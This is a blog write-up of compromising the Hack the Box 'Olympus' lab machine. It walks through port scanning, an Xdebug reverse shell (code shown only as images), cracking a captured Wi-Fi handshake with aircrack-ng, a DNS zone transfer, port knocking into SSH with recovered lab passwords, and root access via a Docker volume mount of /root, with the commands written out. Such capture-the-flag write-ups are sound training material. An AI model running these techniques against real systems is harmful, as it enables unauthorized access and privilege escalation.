{Hack the Box} \\ Olympus Write-Up

Posted on | Post modified | In , |
Reading time 10

olympus

Hi everyone,

In this article I’ll show you guys how I pwned Olympus machine on Hack the Box.
Lets start..

Enumeration

First thing we need to do is enumerating ports. I will be using masscan for quicly enumerating all ports.
I recommend you to use this awesome tool.

1
2
3
4
5
6
7
8
9
10
root@89e502fff05a:~/pentest/hack-the-box/machines/olympus# masscan -p1-65535 10.10.10.83 --rate=200 -e tun0

Starting masscan 1.0.6 (http://bit.ly/14GZzcT) at 2018-09-20 16:08:21 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 2222/tcp on 10.10.10.83
Discovered open port 53/tcp on 10.10.10.83
Discovered open port 80/tcp on 10.10.10.83

There are some ports opened. Lets run nmap for more information.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@89e502fff05a:~/pentest/hack-the-box/machines/olympus# nmap -sS -sV -sC -p53,80,2222 -o nmap.txt 10.10.10.83
Nmap scan report for 10.10.10.83
Host is up (0.074s latency).

PORT     STATE SERVICE VERSION
53/tcp   open  domain  (unknown banner: Bind)
| dns-nsid:
|_  bind.version: Bind
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|     bind
|_    Bind
80/tcp   open  http    Apache httpd
|_http-title: Crete island - Olympus HTB
2222/tcp open  ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-City of olympia
| ssh-hostkey:
|   2048 f2:ba:db:06:95:00:ec:05:81:b0:93:60:32:fd:9e:00 (RSA)
|   256 79:90:c0:3d:43:6c:8d:72:19:60:45:3c:f8:99:14:bb (ECDSA)
|_  256 f8:5b:2e:32:95:03:12:a3:3b:40:c5:11:27:ca:71:52 (ED25519)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :

Apache is running in port 80. We have a web page.
Lets check it first.

img

There is a picture as background of body. I looked the source code of the page and nothing is usefull. So I thought maybe thats a steganography challenge ?
Downloaded that image and run steghide and binwalk on it. And I got nothing.
And I decided to take a look at the server response, maybe I can find something.

img

Yeah. Thats realy interesting. Xdebug is a PHP extension for debugging.
That header also tells us the version of xdebug. I searched on google and I saw that version has a vulnerabilty.

Exploitation (stage-one)

I wrote a simple script that drops me a reverse-shell.

img

img

Enumeration from the inside

I am www-data now. Thats good but I realized that box is actually a docker container.
That means we are not inside the real box. Anyway, I found a zeus username in /etc/passwd file. I looked the /home/zeus dir.
I saw airgeddon folder, here:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
drwxr-xr-x 1 zeus zeus   4096 Apr  8 10:56 .
drwxr-xr-x 1 zeus zeus   4096 Apr  8 10:56 ..
-rw-r--r-- 1 zeus zeus    264 Apr  8 00:58 .editorconfig
drwxr-xr-x 1 zeus zeus   4096 Apr  8 00:59 .git
-rw-r--r-- 1 zeus zeus    230 Apr  8 00:58 .gitattributes
drwxr-xr-x 1 zeus zeus   4096 Apr  8 00:59 .github
-rw-r--r-- 1 zeus zeus     89 Apr  8 00:58 .gitignore
-rw-r--r-- 1 zeus zeus  15855 Apr  8 00:58 CHANGELOG.md
-rw-r--r-- 1 zeus zeus   3228 Apr  8 00:58 CODE_OF_CONDUCT.md
-rw-r--r-- 1 zeus zeus   6358 Apr  8 00:58 CONTRIBUTING.md
-rw-r--r-- 1 zeus zeus   3283 Apr  8 00:58 Dockerfile
-rw-r--r-- 1 zeus zeus  34940 Apr  8 00:58 LICENSE.md
-rw-r--r-- 1 zeus zeus   4425 Apr  8 00:58 README.md
-rw-r--r-- 1 zeus zeus 297711 Apr  8 00:58 airgeddon.sh
drwxr-xr-x 1 zeus zeus   4096 Apr  8 00:59 binaries
drwxr-xr-x 1 zeus zeus   4096 Apr  8 17:31 captured
drwxr-xr-x 1 zeus zeus   4096 Apr  8 00:59 imgs
-rw-r--r-- 1 zeus zeus  16315 Apr  8 00:58 known_pins.db
-rw-r--r-- 1 zeus zeus 685345 Apr  8 00:58 language_strings.sh
-rw-r--r-- 1 zeus zeus     33 Apr  8 00:58 pindb_checksum.txt

That captured folder is interesting. I looked inside and:

1
2
3
4
drwxr-xr-x 1 zeus zeus   4096 Apr  8 17:31 .
drwxr-xr-x 1 zeus zeus   4096 Apr  8 10:56 ..
-rw-r--r-- 1 zeus zeus 297917 Apr  8 12:48 captured.cap
-rw-r--r-- 1 zeus zeus     57 Apr  8 17:30 papyrus.txt

papyrus.txt

1
Captured while flying. I'll banish him to Olympia - Zeus

That message maybe could help later.

captured.cap

I copied that file using netcat. When you transfering something always make sure the file is not broken, check the md5sum.

img

img

I dedided to crack the file.

img

1
aircrack-ng captured.cap -w ~/pentest/wordlist/rockyou.txt

img

SSID: Too_cl0se_to_th3_Sun noted.
After 20-30 mins later aircrack-ng cracked the file.
The password is flightoficarus

Stage Two

I tried to connect to the machine using ssh with username zeus and passwords I found, but didn’t worked.

gif

Than I thought, I know I am in a docker container. There isn’t another user on that container. There must be another container or actual box itself.
So I tried with username icarus and passwords I found. It worked.
icarus is the right username, and the password is Too_cl0se_to_th3_Sun

1
ssh icarus@10.10.10.83 -p 2222

img

gif

Enumeration

Found something interesting again. ctfolympus.htb
Lets add this domain in our /etc/hosts file.

I already checked that dns service I found earlier with nmap.
But I didn’t find anything. Lets check again.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@89e502fff05a:~# dig axfr @10.10.10.83 ctfolympus.htb

; <<>> DiG 9.11.4-4-Debian <<>> axfr @10.10.10.83 ctfolympus.htb
; (1 server found)
;; global options: +cmd
ctfolympus.htb.		86400	IN	SOA	ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
ctfolympus.htb.		86400	IN	TXT	"prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"
ctfolympus.htb.		86400	IN	A	192.168.0.120
ctfolympus.htb.		86400	IN	NS	ns1.ctfolympus.htb.
ctfolympus.htb.		86400	IN	NS	ns2.ctfolympus.htb.
ctfolympus.htb.		86400	IN	MX	10 mail.ctfolympus.htb.
crete.ctfolympus.htb.	86400	IN	CNAME	ctfolympus.htb.
hades.ctfolympus.htb.	86400	IN	CNAME	ctfolympus.htb.
mail.ctfolympus.htb.	86400	IN	A	192.168.0.120
ns1.ctfolympus.htb.	86400	IN	A	192.168.0.120
ns2.ctfolympus.htb.	86400	IN	A	192.168.0.120
rhodes.ctfolympus.htb.	86400	IN	CNAME	ctfolympus.htb.
RhodesColossus.ctfolympus.htb. 86400 IN	TXT	"Here lies the great Colossus of Rhodes"
www.ctfolympus.htb.	86400	IN	CNAME	ctfolympus.htb.
ctfolympus.htb.		86400	IN	SOA	ns1.ctfolympus.htb. ns2.ctfolympus.htb. 2018042301 21600 3600 604800 86400
;; Query time: 79 msec
;; SERVER: 10.10.10.83#53(10.10.10.83)
;; WHEN: Fri Sep 21 15:06:00 UTC 2018
;; XFR size: 15 records (messages 1, bytes 475)

This message looks interesting..

1
"prometheus, open a temporal portal to Hades (3456 8234 62431) and St34l_th3_F1re!"

As I could understand there is another place to go. 3456, 8234, 62431 these numbers also weird.
prometheus must be a username, St34l_th3_F1re! must be password. I tried with ssh again but didn’t worked.
I was stucked here. But my friend Kunal told me about port-knocking.

I searched on google and found these great articles.

  • https://www.digitalocean.com/community/tutorials/how-to-use-port-knocking-to-hide-your-ssh-daemon-from-attackers-on-ubuntu
  • https://www.bgasecurity.com/2014/05/port-knocking-yontemi-ile-portlar/

Basicly the port 22 is opened but hidden. We can’t access directly. But if we knock specific ports in a particular order, knockd service catch that sequence and allow us to connect.
Doen’t matter if that ports closed or not.

Stage three

1
apt install knockd

1
2
root@89e502fff05a:~# knock ctfolympus.htb 3456 8234 62431 && ssh prometheus@ctfolympus.htb
prometheus@ctfolympus.htb's password: St34l_th3_F1re!

img

In the home folder of prometheus there is a message from gods.
That message I think useless.

img

I’m in docker users group. Thats important.
Lets have a look at docker images and containers.

img

Getting root

I want root flag, right ?
Docker allow us to share our data between our machine and docker containers. So all I need to do is bind the /root partition and I can read what I want..

1
docker run --rm -it -v /root:/pwned olympia /bin/bash

It will create new container and execute the /bin/bash for us. –rm flag means delete the container when we exit.

img

Or we could use like this for just grab the flag..

1
docker run --rm -it -v /root:/pwned olympia /bin/bash -c "/bin/cat /pwned/root.txt"

img

Almost forgot, I wanna show you guys how knockd daemon configured on this machine. Check this.

img

gif

Thats it for Olympus. I learned a few things from this machine.
If you have a question or something you can leave a comment.
See you guys later.

0%